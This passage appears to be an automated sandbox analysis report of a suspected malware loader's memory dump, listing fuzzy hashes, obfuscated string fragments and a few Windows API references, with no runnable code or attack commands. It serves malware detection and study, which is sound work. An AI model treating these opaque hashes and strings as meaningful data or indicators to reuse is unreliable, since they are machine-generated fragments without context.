                                                                                                  • Instruction ID: ccad30b6dcc476866ed8e691afcd1205d7334b7ec1782e1d821448a32adf35b5
                                                                                                  • Opcode Fuzzy Hash: a7a1f39499a5e99c848ff68f033dae6045633c5ac20e702f25ecc2a0062ac25d
                                                                                                  • Instruction Fuzzy Hash: 41A1ACB2E002688FEB148FA8DC917DEBBB1FB45304F5145B9D91AAB281DB3059468F94
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: o4i$$w=q$1c;m$5k5u$A$S<.+
                                                                                                  • API String ID: 0-1763114429
                                                                                                  • Opcode ID: da2264087117273adc8f8cbb7abf3b3369941c733713fa4ddd61a4a78f3232fe
                                                                                                  • Instruction ID: afb31bd0c27c82544a17a6576629b60a2b4a96c899e5dad63360a4cbb890e339
                                                                                                  • Opcode Fuzzy Hash: da2264087117273adc8f8cbb7abf3b3369941c733713fa4ddd61a4a78f3232fe
                                                                                                  • Instruction Fuzzy Hash: D4D1ADB55093808BD7348F29C4A17EBB7E1EFD6314F05896ED4CA8B351EB785901CB86
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %751$./$4=/U$E]Qw$wNoL$j^h
                                                                                                  • API String ID: 0-997366216
                                                                                                  • Opcode ID: 9ad3b405c217e9d1e4c0f6edf70f746ac05b5820c8d0e78aa04361182b97f1d7
                                                                                                  • Instruction ID: 7a5dc0394ecbf34ac9b8307d7efc7bae40aec903ea1c7f0c69f60aa070f276f3
                                                                                                  • Opcode Fuzzy Hash: 9ad3b405c217e9d1e4c0f6edf70f746ac05b5820c8d0e78aa04361182b97f1d7
                                                                                                  • Instruction Fuzzy Hash: 12C19B7564C3444BD324EF6488502ABFBE39FC1304F19883DE4D5AB382D6B9C9168B8B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )L$*+$@C$HR$pO
                                                                                                  • API String ID: 0-3083683625
                                                                                                  • Opcode ID: 0aaee39fcba311e15bc1f38c0aae4a491dfa01ec6e052e56f652e43bf11aa76a
                                                                                                  • Instruction ID: 5fe24d867cb9075332fe1ade04ad22fabc6e99e6679ddeed31bd91dff5edfe56
                                                                                                  • Opcode Fuzzy Hash: 0aaee39fcba311e15bc1f38c0aae4a491dfa01ec6e052e56f652e43bf11aa76a
                                                                                                  • Instruction Fuzzy Hash: 637134B06493518BD310DF25E89166BBBF1EFD2360F58891DE4C18B391E7789505CB8B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: -
                                                                                                  • API String ID: 0-2547889144
                                                                                                  • Opcode ID: 6310d2c406e9cc477afe31215b7d1a469a2c990294c66a01fa1cb42ab7ab9bad
                                                                                                  • Instruction ID: 2db9ac68f453c0b2d94bf9f393f819a8b1a8f76bd3cef0c41518664d486a93b6
                                                                                                  • Opcode Fuzzy Hash: 6310d2c406e9cc477afe31215b7d1a469a2c990294c66a01fa1cb42ab7ab9bad
                                                                                                  • Instruction Fuzzy Hash: B0F114766183529BD714CF29C8906ABB7E2EFC9310F08896DE8C587391EB38DD45C752
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 54+*$7$:_A$gfff
                                                                                                  • API String ID: 0-323440868
                                                                                                  • Opcode ID: ef99c69aae7ebca8759eae803294edf467de6f070c2877fa02e645cc48d7660a
                                                                                                  • Instruction ID: 974855a4ab02da3001828df224cdb3c791939bff7d675949acd43d199703548e
                                                                                                  • Opcode Fuzzy Hash: ef99c69aae7ebca8759eae803294edf467de6f070c2877fa02e645cc48d7660a
                                                                                                  • Instruction Fuzzy Hash: 5EB13972A142118BD328CF38CC527EBBAD6EBC5314F0A867DD885DB395DB78980687C5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *+$1>$bxB$OI
                                                                                                  • API String ID: 0-1035774624
                                                                                                  • Opcode ID: b638a3a3900de88040439206c35891a4249c7e51ff3c4424b8b62b3d3637280b
                                                                                                  • Instruction ID: 2bcf0024169a31bcf5d17f9542290146e57be21ae5465408edeec82165f3d5e6
                                                                                                  • Opcode Fuzzy Hash: b638a3a3900de88040439206c35891a4249c7e51ff3c4424b8b62b3d3637280b
                                                                                                  • Instruction Fuzzy Hash: 3791ECB46083808FD734DF24E852BAFB7A1FB82314F44492DE5898B241DB789946CB5B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: 54+*$54+*$54+*$MnA
                                                                                                  • API String ID: 2994545307-957495038
                                                                                                  • Opcode ID: 8f06322f8e6d6c7ea759cd23599a080b87f48ffbe2650b3fb3614bfedb925110
                                                                                                  • Instruction ID: dd597300f9b4ef6573e6ef65d23cc5c487566c46e2a7da0a635b7d7db396d5cc
                                                                                                  • Opcode Fuzzy Hash: 8f06322f8e6d6c7ea759cd23599a080b87f48ffbe2650b3fb3614bfedb925110
                                                                                                  • Instruction Fuzzy Hash: E261E97461D3808FD315CB3888907EBBBE5EB8A350F25896ED1D1C72A1D738D885CB5A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !&& $2"\\$v
                                                                                                  • API String ID: 0-66690623
                                                                                                  • Opcode ID: 4dfb5fb78e8a455e5ad835274cf3511fda185d48fb834496ef83a700337ad192
                                                                                                  • Instruction ID: e9b17d7d6cb25fd7e8af81ca0dca0c33645f5d3503e302bb4264f03f34b07c3b
                                                                                                  • Opcode Fuzzy Hash: 4dfb5fb78e8a455e5ad835274cf3511fda185d48fb834496ef83a700337ad192
                                                                                                  • Instruction Fuzzy Hash: 62527B7450C3818FC725CF25C8506AFBFE1AF96314F088A6EE8D54B392D7398946CB56
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: 54+*$54+*$54+*
                                                                                                  • API String ID: 2994545307-26850336
                                                                                                  • Opcode ID: a67e97fda4feb9dd47d5dd4a0776e3bc287d4b57f4707a9353eb73cb6bf7ee0f
                                                                                                  • Instruction ID: d7f07654b581cdb91e5346d4e79727cc379c0b8875721e9d15300a6a5d61dc92
                                                                                                  • Opcode Fuzzy Hash: a67e97fda4feb9dd47d5dd4a0776e3bc287d4b57f4707a9353eb73cb6bf7ee0f
                                                                                                  • Instruction Fuzzy Hash: 0FD177357883009FDB14CB25C882A7BB7A2EBC9354F18A52EE5C557391C778EC06878B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F]EH$Uo#_$[:
                                                                                                  • API String ID: 0-1241761701
                                                                                                  • Opcode ID: d3126adfd973d3248ca04cd93e27acaf3fc7bc708df34f2fc2eacb6372e1e1a0
                                                                                                  • Instruction ID: b3be92acc381a827a91cc0f17c6e37e2be9106d66737dd4d561d2fb3aa3361bd
                                                                                                  • Opcode Fuzzy Hash: d3126adfd973d3248ca04cd93e27acaf3fc7bc708df34f2fc2eacb6372e1e1a0
                                                                                                  • Instruction Fuzzy Hash: 3C7158B4A083A19BD3198B3994A033BBBE09F97305F58856EF4D68B381D67D8C04C756
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F]EH$Uo#_$[:
                                                                                                  • API String ID: 0-1241761701
                                                                                                  • Opcode ID: 36fd720ed8d6823c32771bfe1625822d316a9a8a9853b2f702ca3dab545584eb
                                                                                                  • Instruction ID: 2ffdbc668ff94129819068ea1ed793c8dcaee62cf96c99cff00229467904dbcf
                                                                                                  • Opcode Fuzzy Hash: 36fd720ed8d6823c32771bfe1625822d316a9a8a9853b2f702ca3dab545584eb
                                                                                                  • Instruction Fuzzy Hash: BF5168A4A093A18BD3188F2994A0337FFE09FE3305F58956EF4D68B381D67D8804C756
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F]EH$Uo#_$[:
                                                                                                  • API String ID: 0-1241761701
                                                                                                  • Opcode ID: 4ffe94aedec0ee075d16d5ca1e3e2f6a888b7093a5e75b5c49b8c05ae89e53b4
                                                                                                  • Instruction ID: 0de7b66c928a3350a22ba3e9d9bb6f9889ec970dbe198820fd9a8fcea16b9496
                                                                                                  • Opcode Fuzzy Hash: 4ffe94aedec0ee075d16d5ca1e3e2f6a888b7093a5e75b5c49b8c05ae89e53b4
                                                                                                  • Instruction Fuzzy Hash: 785179B4A093A18BD3098B2994A033BFFE09FD3305F58955EF4D68B381D67D8804C756
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F]EH$Uo#_$[:
                                                                                                  • API String ID: 0-1241761701
                                                                                                  • Opcode ID: 75d27e60beb243e9c3408e842da1e13c30d6f828246f723bff5a19cc79804c01
                                                                                                  • Instruction ID: 61dd48889cf855c270f3eeb86a6ea88740ffcb6d6eea17eed08dc00024456671
                                                                                                  • Opcode Fuzzy Hash: 75d27e60beb243e9c3408e842da1e13c30d6f828246f723bff5a19cc79804c01
                                                                                                  • Instruction Fuzzy Hash: 355166B0A093A18BD3088B2894A033BFFE09FD3305F58956EE4D68B381D67D8804C756
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ($0' :$g
                                                                                                  • API String ID: 0-2894493355
                                                                                                  • Opcode ID: 127e783f08fa03dc1526e31b0ee453c704f7bbf9130a5869e8a9e0373e6e0c28
                                                                                                  • Instruction ID: 82fddf1245ea9785951fab6b19b0e18f29a6b2d5cfba79b1b40d0bceeec468ca
                                                                                                  • Opcode Fuzzy Hash: 127e783f08fa03dc1526e31b0ee453c704f7bbf9130a5869e8a9e0373e6e0c28
                                                                                                  • Instruction Fuzzy Hash: F651F26531D3D24BDB298F3598653FBBBE2DB93304F5C496DC0CA87282DB3984068796
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ($0' :$g
                                                                                                  • API String ID: 0-2894493355
                                                                                                  • Opcode ID: 60e313afede76628c7910cabc6e2c24f69d92bdb4d83de5ca37a98b6c8095f76
                                                                                                  • Instruction ID: ab1398b02a8a7281b2a45260371c8ad29eb33f1a8b52771f88fa1d3f98cb6ccb
                                                                                                  • Opcode Fuzzy Hash: 60e313afede76628c7910cabc6e2c24f69d92bdb4d83de5ca37a98b6c8095f76
                                                                                                  • Instruction Fuzzy Hash: 7341D37061C3D28ADB394F3494293FBBBE1DB93304F5849ADC0C987282DB394106879A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ($0' :$g
                                                                                                  • API String ID: 0-2894493355
                                                                                                  • Opcode ID: b96d02e88c0a58c109baa3d55930f9ba5c7ef7b50bcf42591470675d5c739625
                                                                                                  • Instruction ID: be085471faecc0e2517363bcce5a64cf4fe5eb468f05be4f0a344c56f6f7ae45
                                                                                                  • Opcode Fuzzy Hash: b96d02e88c0a58c109baa3d55930f9ba5c7ef7b50bcf42591470675d5c739625
                                                                                                  • Instruction Fuzzy Hash: 9031F46021C3D28ADB394F3494593FBBBE1DB93304F98496EC0C987292CB394106CB5A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AL7$KNCI$X
                                                                                                  • API String ID: 0-2162001628
                                                                                                  • Opcode ID: 2d3aa0b5dc2908d3afa6b89691fa5862a8d4e30f209e389472789df3b9353774
                                                                                                  • Instruction ID: c1efb55ec262374922805156c2cb0b218ab5fdccaf3554e53de449f270c0e8b1
                                                                                                  • Opcode Fuzzy Hash: 2d3aa0b5dc2908d3afa6b89691fa5862a8d4e30f209e389472789df3b9353774
                                                                                                  • Instruction Fuzzy Hash: 27F0A9B011D3909BE350AF69969065FFBF8EF96320F502A2CFAD49B242C334C0018F46
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427B68
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00427C72
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID:
                                                                                                  • API String ID: 237503144-0
                                                                                                  • Opcode ID: 5a29734b277b2e9b8358fa5ecbf45429ecc3aeb30d586a3974802221ebf8515b
                                                                                                  • Instruction ID: 247fa94026213c22a70afdfae02ba9db67c982c8a71b05e85d253056af3d2863
                                                                                                  • Opcode Fuzzy Hash: 5a29734b277b2e9b8358fa5ecbf45429ecc3aeb30d586a3974802221ebf8515b
                                                                                                  • Instruction Fuzzy Hash: FE324376A0C350CFD3108F29E88072EB7E1EF86314F19867DE99597391DB74E9018B8A
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427B68
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00427C72
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID:
                                                                                                  • API String ID: 237503144-0
                                                                                                  • Opcode ID: 5f34821947dbddbcf30ce221ada36af6612115f31c02cf9bf287c06683c0a9f8
                                                                                                  • Instruction ID: 345d3084dec7a3450128b1aec3c018c2bdda3eb4c1cf0a9ab4d6be0b7558935f
                                                                                                  • Opcode Fuzzy Hash: 5f34821947dbddbcf30ce221ada36af6612115f31c02cf9bf287c06683c0a9f8
                                                                                                  • Instruction Fuzzy Hash: 3B324476A0C350CFD3248F29E88071EB7E1EF86314F19867DE99597391DB34E9018B8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: C=$D]+\
                                                                                                  • API String ID: 0-9813778
                                                                                                  • Opcode ID: b6a84abd2839b95c80c6a07005a96518be76de580fe6589eb625db292694bc81
                                                                                                  • Instruction ID: cd0c9bfdefc84b350a232778b7e2c0df60d2e4748fd71e5e92d8149e0538340d
                                                                                                  • Opcode Fuzzy Hash: b6a84abd2839b95c80c6a07005a96518be76de580fe6589eb625db292694bc81
                                                                                                  • Instruction Fuzzy Hash: 7F5223746093009BD7149F24EC81BABB7A1FFCA314F14492DE581973A1E738E946CB9A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !;P$3;P
                                                                                                  • API String ID: 0-2962031992
                                                                                                  • Opcode ID: d5e4f07c2787d845fb65e5a98866e9f50cd63d594b10ba433d030bc227476e3b
                                                                                                  • Instruction ID: 40303969f341cab0190b7ffaf639a3eee83e9144fdcd8cc0720d9d15948ab37b
                                                                                                  • Opcode Fuzzy Hash: d5e4f07c2787d845fb65e5a98866e9f50cd63d594b10ba433d030bc227476e3b
                                                                                                  • Instruction Fuzzy Hash: 211275B2A50616CFCB048F68CC812EBBBB2FF55314F19856DD445AB391D338A892CBC4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .8$10
                                                                                                  • API String ID: 0-814249144
                                                                                                  • Opcode ID: 32d5e060f1d652f2465254695c79ef22fd30b916abb47e7b2ed794c844420618
                                                                                                  • Instruction ID: 6ecdc93fcc257772eba09db5fa8149ff251927af64ff6b659e51a55be0f97946
                                                                                                  • Opcode Fuzzy Hash: 32d5e060f1d652f2465254695c79ef22fd30b916abb47e7b2ed794c844420618
                                                                                                  • Instruction Fuzzy Hash: 23C15B717083209BD724DF28D95163BF3E1EF91324F49892EE89697391E7B8E801C35A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 54+*$L4
                                                                                                  • API String ID: 0-1428210418
                                                                                                  • Opcode ID: b8bc600fa4d70428250f3d62d1b0c4869235ddbcb5ebdaa6d2aff065ca03eef8
                                                                                                  • Instruction ID: b6df84392dfbbf32e231f27527d6559e31459186b39928bbcdb8bfc668edbfbe
                                                                                                  • Opcode Fuzzy Hash: b8bc600fa4d70428250f3d62d1b0c4869235ddbcb5ebdaa6d2aff065ca03eef8
                                                                                                  • Instruction Fuzzy Hash: 6691D1B56083419FD714CF29D8A1BABB7E2BFD5304F14492DE48A83251D738EC46CB5A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 54+*$MnA
                                                                                                  • API String ID: 0-3213807796
                                                                                                  • Opcode ID: f66647ee9ab0e35559181c8ae5c5de11cfb4496e1a8266f8898e9403b5961e50
                                                                                                  • Instruction ID: 6e584b5c880dee98a52d54ab6d2185dce934cf6ba25eebf79510f41c98d88442
                                                                                                  • Opcode Fuzzy Hash: f66647ee9ab0e35559181c8ae5c5de11cfb4496e1a8266f8898e9403b5961e50
                                                                                                  • Instruction Fuzzy Hash: 0051F67420D3508BD7288B14D9D0BABB7A2EFCA318F25967DD58697291C335E843C78E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: '}$yz
                                                                                                  • API String ID: 0-4283282396
                                                                                                  • Opcode ID: f79d7379e376645b73c42350e5ee51e8a145ed93f69b725fee394d330310c919
                                                                                                  • Instruction ID: 6c98babec1c2cee739f789cf685c2ea4349774288cd61dce89ebb6089c752d52
                                                                                                  • Opcode Fuzzy Hash: f79d7379e376645b73c42350e5ee51e8a145ed93f69b725fee394d330310c919
                                                                                                  • Instruction Fuzzy Hash: A91132759002298FCB00CF54D8D06EE77B2FF41344F151569D851BB2A0CB389946CB99
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: cu16
                                                                                                  • API String ID: 0-1393213281
                                                                                                  • Opcode ID: 9ac8e299f1cf1d63ed86c6bd82d1a592ff0dcb59a841c00e2249b3a717890619
                                                                                                  • Instruction ID: cc1519bfc60c4b12a942df2b806186209cadf443f4b6312827fcc7d0bb8de627
                                                                                                  • Opcode Fuzzy Hash: 9ac8e299f1cf1d63ed86c6bd82d1a592ff0dcb59a841c00e2249b3a717890619
                                                                                                  • Instruction Fuzzy Hash: CB22363A608251DFC704CF28D8A126AF7F2FB8A314F09857ED98987351D734E955CB89
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: cu16
                                                                                                  • API String ID: 0-1393213281
                                                                                                  • Opcode ID: 0068fcea1fcce90b3d7b75575ae24fd46d4f308cccbdaad663dec9647c00860c
                                                                                                  • Instruction ID: ab146c73076e2240b060154e7353531ea1e8eb1c5403ea302177df520b4c5a47
                                                                                                  • Opcode Fuzzy Hash: 0068fcea1fcce90b3d7b75575ae24fd46d4f308cccbdaad663dec9647c00860c
                                                                                                  • Instruction Fuzzy Hash: 8D120339608250DFC708CF28E8A166AF7F2FB8A314F09857EE98987351D734D955CB89
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: cu16
                                                                                                  • API String ID: 0-1393213281
                                                                                                  • Opcode ID: a8b42d00aa42b6c5f4fdbec2012c9a4f829a243eac6bcdfeac6ada73ec91b821
                                                                                                  • Instruction ID: b47343fc74fa199a2dd3296f085def7190a0f10b9a04de121b961ff035c16150
                                                                                                  • Opcode Fuzzy Hash: a8b42d00aa42b6c5f4fdbec2012c9a4f829a243eac6bcdfeac6ada73ec91b821
                                                                                                  • Instruction Fuzzy Hash: A6F10136608251DFC704CF28D8A066AF7F2FB8A318F09897EE58987351C735E955CB89
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: cu16
                                                                                                  • API String ID: 0-1393213281
                                                                                                  • Opcode ID: 2fdcadc8431d5e275e97618014f6d9204e5a36a54ec6d05914a11fb32c429fef
                                                                                                  • Instruction ID: a8adab88cd6467e8744eccda8f8671d0fd7897d1ea11a103ef712ebcb60b2b94
                                                                                                  • Opcode Fuzzy Hash: 2fdcadc8431d5e275e97618014f6d9204e5a36a54ec6d05914a11fb32c429fef
                                                                                                  • Instruction Fuzzy Hash: 3CE100366082508FD304CF38D89066BFBE2EB8A314F09897EE99987351D735D905CB89
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: cu16
                                                                                                  • API String ID: 0-1393213281
                                                                                                  • Opcode ID: 7970cd6754f9a29d7eb6efe6f2f2c38251dbb01199b4c91cf1d898bcd2063352
                                                                                                  • Instruction ID: a6b8655c2d4fe843f733019638999d7a326d799a2e10267b81ba0de51ceb402d
                                                                                                  • Opcode Fuzzy Hash: 7970cd6754f9a29d7eb6efe6f2f2c38251dbb01199b4c91cf1d898bcd2063352
                                                                                                  • Instruction Fuzzy Hash: 41E10136608250DFD704CF28D8A066AFBE2FB8A314F09897EE59987351C735E915CB89
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1903841874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: -.-2
                                                                                                  • API String ID: 0-2838677626
